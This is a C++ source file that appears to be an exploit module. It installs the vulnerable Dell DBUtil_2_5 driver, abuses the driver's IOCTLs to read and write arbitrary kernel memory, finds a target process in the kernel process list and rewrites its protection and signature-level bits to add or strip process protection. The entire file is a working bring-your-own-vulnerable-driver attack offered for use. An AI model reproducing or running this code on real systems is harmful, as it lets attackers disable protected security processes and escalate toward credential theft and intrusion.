#include <Windows.h>
#include <Psapi.h>
#include <newdev.h>
#include <string>
#include <sstream>
#include <filesystem>

#include "common.h"

namespace
{
    const std::string s_driverHandle("\\\\.\\DBUtil_2_5");

    const uint32_t s_write_ioctl = 0x9b0c1ec8;
    const uint32_t s_read_ioctl = 0x9b0c1ec4;

    struct Offsets
    {
        uint64_t UniqueProcessIdOffset;
        uint64_t ActiveProcessLinksOffset;
        uint64_t SignatureLevelOffset;
    };

    uint64_t readPrimitive(HANDLE p_device, uint64_t p_address)
    {
        uint64_t read_data[4] = { 0, p_address, 0, 0 };
        uint64_t response[4] = { };
        DWORD dwBytesReturned = 0;
        DeviceIoControl(p_device, s_read_ioctl, &read_data, sizeof(read_data), &response, sizeof(response), &dwBytesReturned, 0);
        return response[3];
    }

    void writePrimitive(HANDLE p_device, uint64_t p_address, uint64_t p_data)
    {
        uint64_t write_data[4] = { 0, p_address, 0, p_data };
        uint64_t response[4] = { };
        DWORD bytesReturned = 0;
        DeviceIoControl(p_device, s_write_ioctl, &write_data, sizeof(write_data), &response, sizeof(response), &bytesReturned, 0);
    }

    bool getDeviceHandle(HANDLE& p_handle)
    {
        p_handle = CreateFileA(s_driverHandle.c_str(), GENERIC_WRITE | GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
        if (INVALID_HANDLE_VALUE == p_handle)
        {
            dprintf("[!] Failed to get a handle to %s: %u", s_driverHandle.c_str(), GetLastError());
            return false;
        }
        return true;
    }

    uint64_t getKernelBaseAddr()
    {
        DWORD out = 0;
        DWORD nb = 0;
        uint64_t return_value = 0;
        if (EnumDeviceDrivers(NULL, 0, &nb))
        {
            PVOID* base = (PVOID*)malloc(nb);
            if (base != NULL && EnumDeviceDrivers(base, nb, &out))
            {
                return_value = (uint64_t)base[0];
            }

            free(base);
            base = NULL;
        }
        return return_value;
    }

    uint64_t getPsInitialSystemProcessAddress(HANDLE p_device)
    {
        const auto NtoskrnlBaseAddress = getKernelBaseAddr();
        dprintf("[+] Ntoskrnl base address: %llx", NtoskrnlBaseAddress);

        // Locating PsInitialSystemProcess address
        HMODULE Ntoskrnl = LoadLibraryA("ntoskrnl.exe");
        if (Ntoskrnl == NULL)
        {
            return false;
        }

        uint64_t PsInitialSystemProcessOffset = (uint64_t)(GetProcAddress(Ntoskrnl, "PsInitialSystemProcess")) - (uint64_t)(Ntoskrnl);
        FreeLibrary(Ntoskrnl);

        return readPrimitive(p_device, NtoskrnlBaseAddress + PsInitialSystemProcessOffset);
    }

    uint64_t getTargetProcessAddress(HANDLE p_device, Offsets p_offsets, uint64_t p_psInitialSystemProcessAddress, uint64_t p_targetPID)
    {
        // Find our process in active process list
        uint64_t head = p_psInitialSystemProcessAddress + p_offsets.ActiveProcessLinksOffset;
        uint64_t current = head;

        do
        {
            uint64_t processAddress = current - p_offsets.ActiveProcessLinksOffset;
            uint64_t uniqueProcessId = readPrimitive(p_device, processAddress + p_offsets.UniqueProcessIdOffset);
            if (uniqueProcessId == p_targetPID)
            {
                return current - p_offsets.ActiveProcessLinksOffset;
            }
            current = readPrimitive(p_device, processAddress + p_offsets.ActiveProcessLinksOffset);
        } while (current != head);

        // oh no
        return 0;
    }

    bool changeProcessProtection(uint64_t targetPID, Offsets offsets, bool p_protect)
    {
        HANDLE Device = INVALID_HANDLE_VALUE;
        if (!getDeviceHandle(Device))
        {
            return false;
        }

        uint64_t PsInitialSystemProcessAddress = getPsInitialSystemProcessAddress(Device);
        if (PsInitialSystemProcessAddress == 0)
        {
            dprintf("[-] Failed to resolve PsInitilaSystemProcess");
            CloseHandle(Device);
            return false;
        }

        uint64_t targetProcessAddress = getTargetProcessAddress(Device, offsets, PsInitialSystemProcessAddress, targetPID);
        if (targetProcessAddress == 0)
        {
            dprintf("[-] Failed to find the target process");
            CloseHandle(Device);
            return false;
        }

        // read in the current protection bits, mask them out, and write it back
        uint64_t flags = readPrimitive(Device, targetProcessAddress + offsets.SignatureLevelOffset);
        dprintf("[+] Current SignatureLevel, SectionSignatureLevel, Type, Audit, and Signer bits (plus 5 bytes): %llx", flags);
        flags = (flags & 0xffffffffff000000);

        if (p_protect)
        {
            // wintcb / protected
            flags = (flags | 0x623f3f);
        }

        dprintf("[+] Writing flags back as: %llx", flags);
        writePrimitive(Device, targetProcessAddress + offsets.SignatureLevelOffset, flags);

        CloseHandle(Device);
        return true;
    }

    bool driver2Setup(HDEVINFO& p_devInfo, SP_DEVINFO_DATA& p_deviceInfoData, const char* p_infPath)
    {
        GUID guid = {};
        char classname[255] = { };
        if (!SetupDiGetINFClassA(p_infPath, &guid, &(classname[0]), sizeof(classname), NULL))
        {
            dprintf("[-] SetupDiGetINFClassA failed: %u", GetLastError());
            return false;
        }

        p_devInfo = SetupDiCreateDeviceInfoList(&guid, NULL);
        if (INVALID_HANDLE_VALUE == p_devInfo)
        {
            dprintf("[-] SetupDiCreateDeviceInfoList failed: %u", GetLastError());
            return false;
        }

        p_deviceInfoData.cbSize = sizeof(SP_DEVINFO_DATA);
        if (!SetupDiCreateDeviceInfoA(p_devInfo, classname, &guid, NULL, NULL, 1, &p_deviceInfoData))
        {
            dprintf("[-] SetupDiCreateDeviceInfoList failed: %u", GetLastError());
            return false;
        }

        char prop_buff[] = "ROOT\\DBUtilDrv2\x00";
        if (!SetupDiSetDeviceRegistryPropertyA(p_devInfo, &p_deviceInfoData, 1, (BYTE*)&prop_buff[0], sizeof(prop_buff)))
        {
            dprintf("[-] SetupDiSetDeviceRegistryPropertyA failed:  %u", GetLastError());
            return false;
        }

        if (!SetupDiCallClassInstaller(0x19, p_devInfo, &p_deviceInfoData))
        {
            dprintf("[-] SetupDiCallClassInstaller failed:  %u", GetLastError());
            return false;
        }

        BOOL restart = 0;
        if (!UpdateDriverForPlugAndPlayDevicesA(NULL, prop_buff, p_infPath, INSTALLFLAG_FORCE | INSTALLFLAG_NONINTERACTIVE, &restart))
        {
            dprintf("[-] UpdateDriverForPlugAndPlayDevicesA failed:  %u", GetLastError());
            return false;
        }

        dprintf("[+] Driver installed!");
        return true;
    }

    void driver2Remove(HDEVINFO& p_devInfo, SP_DEVINFO_DATA& p_deviceInfoData)
    {
        if (p_devInfo != INVALID_HANDLE_VALUE)
        {
            dprintf("[+] Removing device");
            SetupDiRemoveDevice(p_devInfo, &p_deviceInfoData);
            p_devInfo = INVALID_HANDLE_VALUE;
        }
    }

    // passed params should be: driver path, pid, enable (1|0), unique proccess id offset, active process link offset, signature level offset 
    bool parse_params(std::string p_params, std::string& p_path_str, uint64_t& p_pid, bool& p_enable, Offsets& p_offsets)
    {
        std::stringstream stream(p_params);
        std::vector<std::string> parsed;
        while (stream.good())
        {
            std::string temp;
            std::getline(stream, temp, ',');
            parsed.push_back(temp);
        }

        if (parsed.size() != 6)
        {
            // wrong amount of params
            return false;
        }

        p_path_str.assign(parsed[0]);
        p_enable = (parsed[2] == "1");

        try
        {
            p_pid = stoull(parsed[1]);
            p_offsets.UniqueProcessIdOffset = stoull(parsed[3]);
            p_offsets.ActiveProcessLinksOffset = stoull(parsed[4]);
            p_offsets.SignatureLevelOffset = stoull(parsed[5]);
        }
        catch (const std::exception&)
        {
            return false;
        }

        return true;
    }
}

int exploit(const char* params)
{
    if (params == NULL)
    {
        dprintf("[!] No params passed to the module.");
        return EXIT_FAILURE;
    }

    std::string path_str;
    uint64_t pid;
    bool enable;
    Offsets offsets = { 0, 0, 0 };
    if (!parse_params(params, path_str, pid, enable, offsets))
    {
        return EXIT_FAILURE;
    }

    path_str.append("\\dbutildrv2.inf");
    if (std::filesystem::exists(path_str) == false)
    {
        dprintf("[!] Could not find the driver's inf file in the provided directory");
        return EXIT_FAILURE;
    }

    HDEVINFO devInfo = NULL;
    SP_DEVINFO_DATA deviceInfoData = { };
    if (!driver2Setup(devInfo, deviceInfoData, path_str.c_str()))
    {
        return EXIT_FAILURE;
    }

    changeProcessProtection(pid, offsets, enable);
    driver2Remove(devInfo, deviceInfoData);

    return EXIT_SUCCESS;
}
